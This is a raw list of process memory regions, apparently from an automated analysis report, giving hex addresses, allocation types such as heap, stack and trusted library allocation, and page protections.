A6D0000
trusted library allocation
page read and write
24BED802000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
20A30A5F000
heap
page read and write
1E0A9C3C000
heap
page read and write
3400000
trusted library allocation
page read and write
24BECD60000
heap
page read and write
98C0000
trusted library allocation
page read and write
3527000
heap
page read and write
7DA0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
8975000
trusted library allocation
page read and write
7D00000
trusted library allocation
page read and write
2286A441000
heap
page read and write
20A30A54000
heap
page read and write
741337B000
stack
page read and write
9820000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
966E000
stack
page read and write
A6B0000
trusted library allocation
page execute and read and write
7D90000
unkown
page read and write
9880000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
A690000
trusted library allocation
page read and write
3523000
heap
page read and write
5C53000
trusted library allocation
page read and write
88FF000
stack
page read and write
9B30000
trusted library allocation
page read and write
7760000
trusted library allocation
page read and write
1086000
trusted library allocation
page read and write
128F000
heap
page read and write
B44F000
trusted library allocation
page read and write
A696000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
8990000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
2BC4B46E000
heap
page read and write
F5CC9F7000
stack
page read and write
8930000
trusted library allocation
page read and write
7610000
trusted library allocation
page read and write
A8AE000
stack
page read and write
7D90000
unkown
page read and write
8937000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
74130FE000
stack
page read and write
88C0000
trusted library allocation
page read and write
9634000
trusted library allocation
page read and write
7DA0000
unkown
page read and write
8930000
trusted library allocation
page read and write
2BC4B413000
heap
page read and write
9880000
trusted library allocation
page read and write
7B00000
trusted library allocation
page read and write
7DA0000
unkown
page read and write
61F8F7C000
stack
page read and write
F5CD17F000
stack
page read and write
3534000
heap
page read and write
9890000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
3410000
trusted library allocation
page read and write
7CD0000
trusted library allocation
page read and write
2BC50B40000
trusted library allocation
page read and write
9A7E000
stack
page read and write
5EF9000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
5307000
trusted library allocation
page execute and read and write
98C0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
52D0000
trusted library allocation
page read and write
C784000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
886C000
trusted library allocation
page read and write
7D90000
unkown
page read and write
96B0000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
A7AE000
stack
page read and write
9B40000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
54C8000
trusted library allocation
page read and write
96B5000
trusted library allocation
page read and write
A7D0000
trusted library allocation
page read and write
9C10000
trusted library allocation
page read and write
10F2000
trusted library allocation
page read and write
910000
heap
page read and write
19EED8D0000
heap
page read and write
98C0000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
44DB7C000
stack
page read and write
8930000
trusted library allocation
page read and write
A6C0000
trusted library section
page read and write
A700000
trusted library allocation
page read and write
A6A1000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
800F000
direct allocation
page read and write
52D4000
trusted library allocation
page read and write
17884940000
heap
page read and write
9B60000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
A6F0000
trusted library allocation
page read and write
889F000
trusted library allocation
page read and write
77D0000
trusted library allocation
page read and write
63C307D000
stack
page read and write
9860000
trusted library allocation
page read and write
A700000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
1E0A9C59000
heap
page read and write
2BC4C5E0000
trusted library section
page readonly
8970000
unkown
page read and write
2286A43D000
heap
page read and write
9890000
trusted library allocation
page read and write
77F0000
trusted library allocation
page read and write
4D0000
remote allocation
page read and write
24BECF02000
heap
page read and write
9B30000
trusted library allocation
page read and write
BBAC000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
8935000
trusted library allocation
page read and write
76F0000
trusted library allocation
page read and write
A730000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
8004000
direct allocation
page read and write
88C0000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
9849000
trusted library allocation
page read and write
5540000
trusted library allocation
page read and write
A750000
trusted library allocation
page read and write
34C0000
heap
page read and write
3523000
heap
page read and write
87B9000
trusted library allocation
page read and write
19EEDA48000
heap
page read and write
9770000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
20A30A5A000
heap
page read and write
34C8000
heap
page read and write
A720000
trusted library allocation
page read and write
9990000
trusted library allocation
page read and write
A6E3000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
9B90000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
96B5000
trusted library allocation
page read and write
8970000
trusted library allocation
page read and write
7760000
trusted library allocation
page read and write
9C9F000
stack
page read and write
8980000
trusted library allocation
page read and write
BBBE000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
3420000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
553E000
stack
page read and write
9B70000
unkown
page read and write
9B60000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
7769000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
9C00000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
741317E000
stack
page read and write
A660000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
1B9B8A49000
heap
page read and write
19EEF9C0000
remote allocation
page read and write
4B5C000
stack
page read and write
A9ED000
stack
page read and write
A720000
trusted library allocation
page read and write
4DBB000
stack
page read and write
BEA6000
trusted library allocation
page read and write
98C5000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
12D6000
heap
page read and write
7DA8000
trusted library allocation
page read and write
992F000
trusted library allocation
page read and write
97D000
heap
page read and write
9B80000
trusted library allocation
page read and write
3448000
heap
page read and write
96D0000
trusted library allocation
page read and write
7D97000
trusted library allocation
page read and write
128C000
heap
page read and write
9BD5000
trusted library allocation
page read and write
9B20000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
96D5000
trusted library allocation
page read and write
88E0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
12B7000
heap
page read and write
BEAE000
trusted library allocation
page read and write
B47F000
trusted library allocation
page read and write
3527000
heap
page read and write
B6C0000
trusted library allocation
page read and write
7B11000
heap
page read and write
7AAE000
stack
page read and write
A6E0000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
5F82AFF000
stack
page read and write
99E0000
trusted library allocation
page read and write
12BE000
heap
page read and write
89A0000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
8945000
trusted library allocation
page read and write
93F000
heap
page read and write
9C50000
trusted library allocation
page read and write
A718000
trusted library allocation
page read and write
88C8000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
79F0000
trusted library allocation
page read and write
A3235FF000
stack
page read and write
96D0000
trusted library allocation
page read and write
9735000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
99F0000
unkown
page read and write
8970000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
982A000
trusted library allocation
page read and write
139BBC40000
heap
page read and write
9A80000
trusted library allocation
page read and write
7850000
trusted library allocation
page read and write
3526000
heap
page read and write
8930000
trusted library allocation
page read and write
98D000
heap
page read and write
51DE000
stack
page read and write
980000
heap
page read and write
2286A458000
heap
page read and write
76B0000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
7DA7000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
1B9B8860000
heap
page read and write
9B40000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
1D5AE002000
heap
page read and write
9BB0000
trusted library allocation
page read and write
9825000
trusted library allocation
page read and write
2BC50B64000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
1290000
heap
page read and write
9BC0000
trusted library allocation
page read and write
55B0000
heap
page read and write
9A8A000
trusted library allocation
page read and write
12E4000
heap
page read and write
97A0000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
950000
heap
page read and write
9BE0000
trusted library allocation
page read and write
98C5000
trusted library allocation
page read and write
1D5AE113000
heap
page read and write
558F000
stack
page read and write
19EEDB18000
heap
page read and write
2286A370000
heap
page read and write
9820000
trusted library allocation
page read and write
2286A457000
heap
page read and write
9880000
unkown
page read and write
96F0000
trusted library allocation
page read and write
12D6000
heap
page read and write
1D5AE026000
heap
page read and write
B46E000
trusted library allocation
page read and write
12F2000
direct allocation
page read and write
79F0000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
9B80000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
7F5E0000
trusted library allocation
page execute and read and write
98D0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
8050000
trusted library allocation
page read and write
12F8000
heap
page read and write
2BC50E2C000
heap
page read and write
7DA0000
trusted library allocation
page read and write
1268000
heap
page read and write
96B0000
trusted library allocation
page read and write
178848D0000
heap
page read and write
9890000
trusted library allocation
page read and write
2286A466000
heap
page read and write
8910000
trusted library allocation
page read and write
7790000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
7FA000
stack
page read and write
7C8E000
stack
page read and write
A680000
trusted library allocation
page read and write
19EEF600000
trusted library allocation
page read and write
24BECE40000
heap
page read and write
A660000
trusted library allocation
page read and write
BE9E000
trusted library allocation
page read and write
17884970000
trusted library allocation
page read and write
9B70000
trusted library allocation
page execute and read and write
7D10000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
880E000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
12F0000
direct allocation
page read and write
5BAF000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
BAD4000
trusted library allocation
page read and write
3AD000
stack
page read and write
5C01000
trusted library allocation
page read and write
9B28000
unkown
page read and write
9901000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
24BECE02000
heap
page read and write
9A20000
trusted library allocation
page read and write
79F0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
19EEF9C0000
remote allocation
page read and write
9820000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
884E000
trusted library allocation
page read and write
9BF0000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
9CD5000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
B730000
trusted library allocation
page read and write
20A308A0000
heap
page read and write
9B30000
trusted library allocation
page execute and read and write
88C0000
trusted library allocation
page read and write
9980000
trusted library allocation
page read and write
139E000
stack
page read and write
98C0000
trusted library allocation
page read and write
1310000
direct allocation
page read and write
98B0000
trusted library allocation
page read and write
5300000
trusted library allocation
page read and write
1E0A9C53000
heap
page read and write
9B84000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
9C60000
trusted library allocation
page read and write
20A30A13000
heap
page read and write
79F0000
trusted library allocation
page read and write
7800000
trusted library allocation
page read and write
88E0000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
1060000
remote allocation
page read and write
55FA000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
A700000
trusted library allocation
page read and write
19EEF9C0000
remote allocation
page read and write
99F000
heap
page read and write
9A00000
unkown
page read and write
98D0000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
9980000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
7600000
trusted library allocation
page read and write
9C40000
trusted library allocation
page read and write
4EFD000
stack
page read and write
7D20000
trusted library allocation
page read and write
36D000
stack
page read and write
9BB0000
trusted library allocation
page read and write
A6C0000
trusted library allocation
page read and write
88E0000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
9A80000
trusted library allocation
page read and write
BA67000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
139BBE23000
heap
page read and write
9890000
trusted library allocation
page read and write
BC78000
trusted library allocation
page read and write
99F000
heap
page read and write
A690000
trusted library allocation
page read and write
2286A460000
heap
page read and write
9980000
trusted library allocation
page read and write
BBDA000
trusted library allocation
page read and write
9A70000
trusted library allocation
page read and write
88D000
heap
page read and write
9AE0000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
8945000
trusted library allocation
page read and write
2286A432000
heap
page read and write
1088000
trusted library allocation
page read and write
9AD0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page execute and read and write
509A000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
19EEDA47000
heap
page read and write
9AF5000
trusted library allocation
page read and write
5F829F7000
stack
page read and write
1B9B8A4B000
heap
page read and write
9B10000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
7D40000
trusted library allocation
page read and write
20A30A24000
heap
page read and write
98A0000
trusted library allocation
page read and write
9BF0000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
EC4C2FF000
stack
page read and write
A6A0000
trusted library allocation
page read and write
A6C0000
trusted library allocation
page read and write
A6C0000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
8803000
trusted library allocation
page read and write
987000
heap
page read and write
A658000
stack
page read and write
1030000
heap
page read and write
8A30000
trusted library allocation
page read and write
1D5ADF90000
heap
page read and write
9870000
trusted library allocation
page read and write
B9F4000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
A7A0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
9C00000
trusted library allocation
page read and write
4E80000
heap
page read and write
9890000
trusted library allocation
page read and write
9C00000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
B467000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
9980000
trusted library allocation
page read and write
B475000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
1B9B8A13000
heap
page read and write
139BBE42000
heap
page read and write
B6FB000
trusted library allocation
page read and write
BE26000
trusted library allocation
page read and write
3420000
trusted library allocation
page read and write
3400000
trusted library allocation
page read and write
127D000
heap
page read and write
5F79000
trusted library allocation
page read and write
2BC4B458000
heap
page read and write
7DA0000
unkown
page read and write
1296000
heap
page read and write
44DC7E000
stack
page read and write
98C0000
trusted library allocation
page read and write
9A80000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
1350000
direct allocation
page read and write
63C31FD000
stack
page read and write
7D90000
trusted library allocation
page read and write
3400000
trusted library allocation
page read and write
3320000
heap
page read and write
9820000
trusted library allocation
page read and write
8970000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
7870000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
1D5AEA02000
trusted library allocation
page read and write
2BC509A0000
trusted library allocation
page read and write
5F823CB000
stack
page read and write
BDC5000
trusted library allocation
page read and write
9950000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
9710000
unkown
page read and write
107B000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
1E0A9C29000
heap
page read and write
4BDF000
stack
page read and write
A660000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
109E000
trusted library allocation
page read and write
B48E000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
9706000
trusted library allocation
page read and write
A6D9000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
A690000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
A690000
trusted library allocation
page read and write
7D20000
trusted library allocation
page read and write
2286A44D000
heap
page read and write
9BA0000
trusted library allocation
page read and write
2BC50C80000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
918000
heap
page read and write
2286A400000
heap
page read and write
9BC0000
trusted library allocation
page read and write
12CE000
heap
page read and write
9890000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
C4E000
stack
page read and write
98C0000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
19EED860000
heap
page read and write
B4D0000
trusted library allocation
page read and write
FBD000
stack
page read and write
10C9000
trusted library allocation
page read and write
87CF000
trusted library allocation
page read and write
9B5F000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
90A000
heap
page read and write
128F000
heap
page read and write
9710000
trusted library allocation
page read and write
7740000
trusted library allocation
page read and write
7D30000
trusted library allocation
page read and write
A3237FF000
stack
page read and write
2BC50EE2000
heap
page read and write
98C0000
trusted library allocation
page read and write
8940000
unkown
page read and write
9BB0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
2BC4C9A0000
trusted library allocation
page read and write
7AB0000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
8975000
trusted library allocation
page read and write
9710000
unkown
page read and write
55E0000
heap
page read and write
9870000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
20A30A79000
heap
page read and write
19EEF3C0000
trusted library allocation
page read and write
3750000
trusted library section
page read and write
7760000
trusted library allocation
page read and write
32AE000
stack
page read and write
9840000
trusted library allocation
page read and write
882F000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
1E0A9D02000
heap
page read and write
9870000
unkown
page read and write
76D0000
trusted library allocation
page read and write
9BF0000
trusted library allocation
page read and write
A6C0000
trusted library allocation
page read and write
A690000
trusted library allocation
page read and write
A720000
trusted library allocation
page read and write
8943000
trusted library allocation
page read and write
893000
heap
page read and write
8990000
trusted library allocation
page read and write
88DE000
trusted library allocation
page read and write
8970000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
BB35000
trusted library allocation
page read and write
2BC509B0000
trusted library allocation
page read and write
139BBECA000
heap
page read and write
9900000
trusted library allocation
page read and write
20A31202000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
2286A43E000
heap
page read and write
A660000
trusted library allocation
page read and write
61F8A7E000
stack
page read and write
9860000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
34C8000
heap
page read and write
19EEDA89000
heap
page read and write
BB45000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
9BA5000
unkown
page read and write
9CA0000
trusted library allocation
page read and write
3410000
trusted library allocation
page read and write
5EB6000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
88E2000
direct allocation
page read and write
9890000
trusted library allocation
page read and write
F5CCAFA000
stack
page read and write
2BC50E56000
heap
page read and write
7870000
trusted library allocation
page execute and read and write
5F71000
trusted library allocation
page read and write
97B0000
unkown
page read and write
7DA0000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
2286A475000
heap
page read and write
7D90000
trusted library allocation
page read and write
7CDF000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
A690000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
4B9D000
stack
page read and write
7D50000
trusted library allocation
page read and write
1B9B8A79000
heap
page read and write
97B0000
trusted library allocation
page read and write
3410000
trusted library allocation
page read and write
1B9B8A70000
heap
page read and write
9B90000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
A6C0000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
12A3000
heap
page read and write
7DA5000
unkown
page read and write
1D5AE03D000
heap
page read and write
A660000
trusted library allocation
page read and write
1D5AE029000
heap
page read and write
7790000
trusted library allocation
page read and write
BAF4000
trusted library allocation
page read and write
B46E000
trusted library allocation
page read and write
10DF000
trusted library allocation
page read and write
9BD5000
trusted library allocation
page read and write
9B30000
trusted library allocation
page read and write
1B9B8B00000
heap
page read and write
34C8000
heap
page read and write
4F37000
stack
page read and write
88C0000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
9A60000
trusted library allocation
page read and write
9690000
trusted library allocation
page read and write
5540000
trusted library allocation
page read and write
7B0000
heap
page read and write
96E000
heap
page read and write
88E0000
trusted library allocation
page read and write
883F000
trusted library allocation
page read and write
7FF0000
direct allocation
page read and write
9C10000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
B467000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
9B80000
trusted library allocation
page read and write
1301000
direct allocation
page read and write
3ADFD7E000
stack
page read and write
7D50000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
139BBE6E000
heap
page read and write
79E0000
trusted library allocation
page read and write
139BC700000
heap
page read and write
9CD0000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
1096000
trusted library allocation
page read and write
390000
remote allocation
page read and write
1E0AA3A0000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
EC4BEFE000
stack
page read and write
B720000
trusted library allocation
page read and write
2286A3D0000
heap
page read and write
98C0000
trusted library allocation
page read and write
9C00000
trusted library allocation
page execute and read and write
78E4000
trusted library allocation
page read and write
A770000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
544E000
stack
page read and write
7DA9000
unkown
page read and write
7DA5000
trusted library allocation
page read and write
9B90000
trusted library allocation
page read and write
A760000
trusted library allocation
page execute and read and write
9AE0000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
20A30B08000
heap
page read and write
A3234FE000
stack
page read and write
98C0000
trusted library allocation
page read and write
9BA0000
trusted library allocation
page read and write
32EE000
stack
page read and write
9BF0000
trusted library allocation
page read and write
79F0000
trusted library allocation
page read and write
10BD000
trusted library allocation
page read and write
8004000
direct allocation
page read and write
96F0000
unkown
page read and write
88C0000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
9876000
unkown
page read and write
2BC4B4B9000
heap
page read and write
A6D0000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
9B30000
trusted library allocation
page read and write
6FC000
stack
page read and write
B467000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
19EEDA57000
heap
page read and write
9B30000
trusted library allocation
page read and write
20A30A70000
heap
page read and write
9840000
trusted library allocation
page read and write
5F82CFF000
stack
page read and write
9630000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
2286A45F000
heap
page read and write
8910000
trusted library allocation
page read and write
A720000
trusted library allocation
page read and write
9A90000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
7DA0000
unkown
page read and write
9880000
trusted library allocation
page read and write
5320000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
8EA000
heap
page read and write
79F0000
trusted library allocation
page read and write
65D6000
trusted library allocation
page read and write
9C11000
trusted library allocation
page read and write
7740000
trusted library allocation
page read and write
4DC000
stack
page read and write
12E6000
heap
page read and write
7AB0000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
777D000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
3499000
heap
page read and write
3410000
trusted library allocation
page read and write
EC4C0FE000
stack
page read and write
9C10000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
BA9A000
trusted library allocation
page read and write
9BF0000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
7880000
trusted library allocation
page read and write
A730000
trusted library allocation
page execute and read and write
9BC0000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
96BA000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
B494000
trusted library allocation
page read and write
8935000
trusted library allocation
page read and write
2BC50EFD000
heap
page read and write
A790000
trusted library allocation
page read and write
12D4000
heap
page read and write
98C0000
trusted library allocation
page read and write
B48E000
trusted library allocation
page read and write
9825000
trusted library allocation
page read and write
2BC4B48F000
heap
page read and write
7CD0000
trusted library allocation
page read and write
8935000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
7DA8000
trusted library allocation
page read and write
9F9ADFB000
stack
page read and write
1D5AE000000
heap
page read and write
1E0A9C5A000
heap
page read and write
88C0000
trusted library allocation
page read and write
BB7E000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
BA3E000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
9B50000
trusted library allocation
page execute and read and write
B9BC000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
BAA3000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
12C1000
heap
page read and write
9F9AAFE000
stack
page read and write
A6E0000
trusted library allocation
page read and write
A720000
trusted library allocation
page read and write
9B80000
trusted library allocation
page execute and read and write
5C51000
direct allocation
page read and write
A6D0000
trusted library allocation
page read and write
98C6000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
8930000
unkown
page read and write
A6C0000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
BBE2000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
99F000
heap
page read and write
A6E0000
trusted library allocation
page read and write
7CD4000
trusted library allocation
page read and write
1B9B8A4E000
heap
page read and write
5BE0000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
5305000
trusted library allocation
page execute and read and write
8910000
trusted library allocation
page read and write
9AE0000
unkown
page read and write
9A00000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
A720000
trusted library allocation
page read and write
2BC50E00000
heap
page read and write
7750000
trusted library allocation
page read and write
9710000
unkown
page read and write
139BBBD0000
heap
page read and write
8930000
unkown
page read and write
BB2D000
trusted library allocation
page read and write
88E0000
trusted library allocation
page read and write
3526000
heap
page read and write
8980000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
92D000
heap
page read and write
8935000
trusted library allocation
page read and write
97F000
heap
page read and write
A690000
trusted library allocation
page read and write
139BBE66000
heap
page read and write
376B000
heap
page read and write
8910000
trusted library allocation
page read and write
A700000
trusted library allocation
page read and write
5710000
trusted library allocation
page read and write
7763000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
1330000
direct allocation
page read and write
2BC4C001000
trusted library allocation
page read and write
FFC000
stack
page read and write
A710000
trusted library allocation
page read and write
7800000
trusted library allocation
page read and write
9C10000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
BBFA000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
3534000
heap
page read and write
34B9000
heap
page read and write
7DA0000
unkown
page read and write
7CD0000
unkown
page read and write
76B0000
trusted library allocation
page read and write
5F02000
trusted library allocation
page read and write
52C0000
trusted library allocation
page read and write
A663000
trusted library allocation
page read and write
2286AE02000
trusted library allocation
page read and write
9AF7000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
20A30A67000
heap
page read and write
9BC0000
unkown
